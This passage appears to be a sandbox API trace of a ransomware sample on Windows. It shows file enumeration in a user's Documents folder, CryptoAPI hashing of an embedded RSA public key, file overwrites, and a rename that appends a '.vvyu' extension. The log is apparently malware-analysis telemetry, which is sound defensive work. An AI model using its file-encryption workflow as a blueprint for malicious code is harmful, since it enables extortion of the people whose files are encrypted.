0x2d39c70 [0191.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0191.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c40 [0191.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0191.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39cd0 [0191.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0191.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0191.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0191.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ca0 [0191.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0191.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c88 [0191.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0191.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ce8 [0191.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c88 | out: hHeap=0x6a0000) returned 1 [0191.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c88 [0191.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ca0 | out: hHeap=0x6a0000) returned 1 [0191.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0191.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0191.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0191.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0191.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0191.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c58 | out: hHeap=0x6a0000) returned 1 [0191.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c58 [0191.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0191.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0191.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cb8 | out: hHeap=0x6a0000) returned 1 [0191.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0191.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ce8 | out: hHeap=0x6a0000) returned 1 [0191.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0191.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0191.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0191.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0191.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0191.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c58 | out: hHeap=0x6a0000) returned 1 [0191.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0191.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0191.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0191.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0191.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0191.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0191.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0191.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0191.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0191.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0191.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0191.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0191.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0191.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c88 | out: hHeap=0x6a0000) returned 1 [0191.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0191.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cd0 | out: hHeap=0x6a0000) returned 1 [0191.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0191.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c70 | out: hHeap=0x6a0000) returned 1 [0191.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c40 | out: hHeap=0x6a0000) returned 1 [0191.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0191.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c28 | out: hHeap=0x6a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30760 | out: hHeap=0x6a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0191.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0191.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0191.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0191.940] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0xd83e, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0xd83e, lpOverlapped=0x0) returned 1 [0191.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0191.941] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xd843, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.941] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0191.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0191.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0191.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0191.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0191.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.942] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0191.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0191.943] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.943] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0191.943] CloseHandle (hObject=0x584) returned 1 [0191.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0191.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d45778 [0191.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0191.945] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\-1Ots4A6s.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\-1ots4a6s.pps"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\-1Ots4A6s.pps.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\-1ots4a6s.pps.vvyu")) returned 1 [0191.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0191.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0191.948] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0191.950] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a92a830, ftCreationTime.dwHighDateTime=0x1d8a557, ftLastAccessTime.dwLowDateTime=0x28d83cb0, ftLastAccessTime.dwHighDateTime=0x1d8a664, ftLastWriteTime.dwLowDateTime=0x28d83cb0, ftLastWriteTime.dwHighDateTime=0x1d8a664, nFileSizeHigh=0x0, nFileSizeLow=0x48bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="31Pg.xls", cAlternateFileName="")) returned 1 [0191.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x794008 [0191.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.951] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\31Pg.xls") returned=".xls" [0191.951] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\31Pg.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\31pg.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0191.952] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=18620) returned 1 [0191.952] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0191.955] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x4896, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.955] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0191.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0191.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0191.958] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.958] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x48bc, lpOverlapped=0x0) returned 1 [0191.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0191.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.959] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.959] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0191.959] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0191.959] CryptHashData (hHash=0x2cbfa90, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.959] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0191.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0191.960] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0191.960] GetLastError () returned 0x0 [0191.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0191.960] GetLastError () returned 0x0 [0191.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0191.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0191.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0191.960] CryptDestroyHash (hHash=0x2cbfa90) returned 1 [0191.960] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0191.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0191.960] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0191.961] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0191.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0191.961] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0191.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0191.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0191.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x48c0) returned 0x2d45778 [0191.961] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0191.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0191.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0191.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0191.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0191.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30760 [0191.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c28 [0191.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d307a8 [0191.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c40 [0191.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c70 [0191.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cd0 [0191.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c88 [0191.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0191.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0191.962] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0191.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0191.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c70 | out: hHeap=0x6a0000) returned 1 [0191.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c88 | out: hHeap=0x6a0000) returned 1 [0191.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cd0 | out: hHeap=0x6a0000) returned 1 [0191.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0191.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0191.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cd0 [0191.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0191.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c88 [0191.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0191.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39c70 [0191.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0191.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0191.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0191.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0191.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0191.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0191.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0191.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0191.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0191.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c88 | out: hHeap=0x6a0000) returned 1 [0191.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0191.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c70 | out: hHeap=0x6a0000) returned 1 [0191.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0191.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0191.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cd0 | out: hHeap=0x6a0000) returned 1 [0191.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0191.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0191.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0191.965] GetCurrentThreadId () returned 0x264 [0191.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0191.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44cf0 [0191.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0191.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0191.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0191.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0191.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0191.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0191.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0191.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0191.966] GetCurrentThreadId () returned 0x264 [0191.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0191.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0191.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0191.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0191.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0191.966] RtlAllocateHeap (HeapHandle=0x6a0000, 